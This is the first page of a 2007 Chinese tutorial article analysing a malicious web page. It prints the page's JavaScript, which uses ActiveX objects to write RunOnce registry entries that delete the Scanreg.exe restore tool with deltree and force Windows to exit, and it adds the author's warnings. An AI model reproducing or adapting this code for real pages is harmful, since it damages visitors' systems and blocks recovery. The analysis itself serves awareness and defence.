文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院操作系统 注册表分析一个网站的恶意代码-注册表全攻略
精品推荐
特别推荐
·自动播放光碟
·解决注册表被锁问题100%有效的办法
·深入剖析恶意攻击性网页-注册表全攻略
·修改注册表,清除黑客程序
·Vista 105个禁止功能的注册表条目
·妙用注册表来清理系统垃圾文件
·更改系统收藏夹路径的三种方法
·用注册表和组策略管好网络设置
·Windows隐蔽的清理注册表垃圾方法
·取消开机检查磁盘的三种方法
·Windows中用注册表来调整输入法的次序
·注册表进行系统限制的优化和设置
·应用技巧 用注册表强化网上邻居
·注意正确的 I E卸载与重装方法
·快速修复被篡改的IE浏览器的代码
·2000、XP、2003下木马、病毒防范之注册表权限设置法
·加载XX.dll时出错的一般解决方法
·修改注册表:为硬盘逻辑分区添加背景图片
·重装操作系统后 怎样找寻失落的注册码
·注册表背后的秘密
热点TOP10
·绝对好用的注册表技巧
·常用注册表设置
·注册表知识:HKEY_LOCAL_MACHINE根键详解
·注册表应用100例—注册表使用全攻略之十一
·禁止使用网上邻居
·注册表背后的秘密
·重装操作系统后 怎样找寻失落的注册码
·修改注册表,清除黑客程序
·如何修改注册表--我来教你
·注册表基础—注册表使用全攻略之一
·Windows注册表修改实例完全手册(下)
·注册表修改大全之XP
·菜鸟必须掌握 如何隐藏电脑硬盘分区
·修改Windows注册表系统文件为宽带加速
·添加或删除启动时自动运行的程序
·妙用注册表来清理系统垃圾文件
·取消开机检查磁盘的三种方法
·自动播放光碟
·深入剖析恶意攻击性网页-注册表全攻略
·注册表进行系统限制的优化和设置

分析一个网站的恶意代码-注册表全攻略

日期:2007年4月4日 作者: 查看:[大字体 中字体 小字体]


57、分析一个网站的恶意代码  

    最近一段时间网页恶意代码对本地注册表的修改可以说是闹得沸沸扬扬,从改IE标题开始到改首页,甚至还发展到锁定INTERNET选项和注册

表编辑器阻止用户恢复自己的IE!真是愈来愈严重了。开始改标题的时候只不过像小孩子跑到别人家的大门上用粉笔涂上“XX到此一游”,到后

来就变质成了强盗要霸占整个家园。本来也许站长的原意是希望自己站点的访问量能高一些,不过很遗憾用错了方法,上过当的网民再也不会到

他的站点去了。好了,废话少说,我们来看一下这究竟是怎么回事。 
     其实这些都是利用了ACTIVE和JS做到的,我们来看这段危险代码。如果浏览了这个网页的话IE跟系统都会被修改得不象样,仅仅可以使用

WINDOWS的基本程序。够狠的了。 
document.write("<APPLET HEIGHT=0 WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>"); 
//this function is only needed if you add favorites or links 
function AddFavLnk(loc, DispName, SiteURL) 
{var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL"); 
Shor.TargetPath = SiteURL; Shor.Save();} 
//end add favorites or links function 
function f(){ try { //ActiveX initialization (这里初始化ACTIVEX,为修改浏览者的注册表做准备。) 
a1=document.applets[0]; 
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); 
a1.createInstance(); 
Shl = a1.GetObject(); 
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); 
a1.createInstance(); 
FSO = a1.GetObject(); 
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); 
a1.createInstance(); 
Net = a1.GetObject(); 
try 
{ //set home page Shl.RegWrite
("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\deltree.exe","start.exe /
m deltree /y c:\\windows\\Command\\Scanreg.exe /q /u 
/autorun");(注意这里,Scanreg.exe被删除!这样就阻挠了浏览者通过恢复浏览之前的注册表来修复系统!想想这意味着什么?它既然可以不

经过同意而删除机器中的文件,那么也可以做别的事情。包括:在没有通知的情况下格式化硬盘!) 
    从这里开始把IE的标题,首页,搜索页等等改得一塌糊涂,亲眼见到的话你一定忍不住想问:这是天天陪着我到处闲逛的IE吗?:) 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\rundll.exe","rundll.exe user.exe,exitwindows"); 

[1] [2] [3] [4] [5] [6] [7] [8] [9] 下一页 




上一篇:深入剖析恶意攻击性网页-注册表全攻略

下一篇:网页攻击教学-注册表全攻略

分析一个网站的恶意代码-注册表全攻略 相关文章:
·QQ空间免费换皮肤代码
·qq空间皮肤背景代码:QQ空间不用Q币更换主页皮肤方法
·QQ空间透明flash代码
·人生哲理:一个人最重要的是他的内心
·绝对好用的注册表技巧
·[最新QQ空间代码]QQ空间花,漂浮物、开场动画代码
·我和一个偷尝禁果的女孩的故事
·免费领养QQ空间五级花最新技巧及代码放送
·如何建立一个网站?规划、设计、目的、原则、宣传
·如何在QQ空间加入播放器代码
分析一个网站的恶意代码-注册表全攻略 相关软件:
·诺顿杀毒软件+诺顿防火墙免费破解版 免注册
·一个真实的宋美龄
·RegVac Registry Cleaner(注册表吸尘器)V5.01.06 汉化版
·超级自动注册申请王 V3.0
·零起点教你如何破解软件和制作注册机 and 视频+程序
·沸腾家园 新东方背单词4-目前最好的背单词软件(免注册) 查看
·功能较强的一个FLASH编辑器
·3D 动画与建模:人体的综合与分析技术
·中国注册会计师独立审计准则 汉英对照
·一个艺妓的回忆

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.viphot.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.viphot.com All Rights Reserved. 鄂ICP备05000083号Powered by:viphot